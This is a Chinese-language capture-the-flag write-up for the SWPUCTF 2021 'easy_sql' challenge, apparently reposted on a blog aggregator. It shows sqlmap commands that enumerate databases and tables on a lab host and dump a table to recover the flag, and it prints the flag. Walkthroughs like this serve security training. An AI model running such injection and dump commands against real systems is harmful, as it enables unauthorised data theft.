当前位置: 首页 > news >正文

[SWPUCTF 2021 新生赛]easy_sql的write up

开启NSSCTF靶场,在浏览器中访问链接,看到让我们输入点什么还有标签页名字提示:

"参数是wllm"

直接/?wllm=1访问一下:

这里就直接用sqlmap直接爆破了:

查看数据库有哪些:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" --dbs

看到test_db就是这个数据库,其他数据库都是sql数据库的必要四个数据库,接下来就查看test_db数据库的表有哪些


查看test_db数据库的表名有哪些:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db --tables

一眼就看出test_tb这个表很关键,接下来就查看一下这个test_tb表的信息


查看test_db数据库的test_tb表的所有数据:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db -T test_tb --dump

很轻松的看出test_db表有flag列,flag列的内容就是题目所求的flag:

NSSCTF{05010966-5970-49bc-bdfd-b244ca7756cb}


http://www.mrgr.cn/news/62244.html

相关文章:

  • ubuntu 下使用deepseek
  • 帝国CMS8.0终极栏目转换或批量改顺序成功后不能返回地址的解决方案
  • 解决 pip install 出现 error: subprocess-exited-with-error 错误的方法
  • MySQL 入门大全:数据类型
  • 0164__【GNU】gcc -O编译选项 -Og -O0 -O1 -O2 -O3 -Os
  • C#项目生成时提示缺少引用
  • 虚拟机Ubuntu实现和宿主机之间的数据传输(只能复制粘贴,包过)
  • JVM系列之内存布局
  • RK3568平台(PWM篇)红外遥控适配
  • 高效构建仓库AGV管理系统:基于Python的路径规划与货架管理
  • 电动车进入电梯数据集、自行车进入电梯数据集 电动车进入电梯VOC数据标注数据集
  • 带你用Go实现二维码小游戏(中)
  • Java AQS 源码
  • 利用双指针法解题
  • RNN在训练中存在的问题
  • 大模型入门综述---从模型,训练,部署全方面认识大模型
  • 如何解决Matplotlib报错:none of the following families were found: SimHei
  • ReactNative Fabric渲染器和组件(5)
  • 统信UOS下启动图形界面应用工具monitor报JAVA相关错:An error has occurred. See the log file
  • 《高频电子线路》 —— 高频谐振功放
  • RK3568平台开发系列讲解(I2C篇)I2C 上拉电阻
  • 统信UOS下启动图形界面应用工具manager报错:No protocol specified的解决办法
  • 不使用三方软件,win系统下禁止单个应用联网能力的详细操作教程
  • C语言实现堆排序
  • Redis 线程控制 问题
  • C语言实现选择排序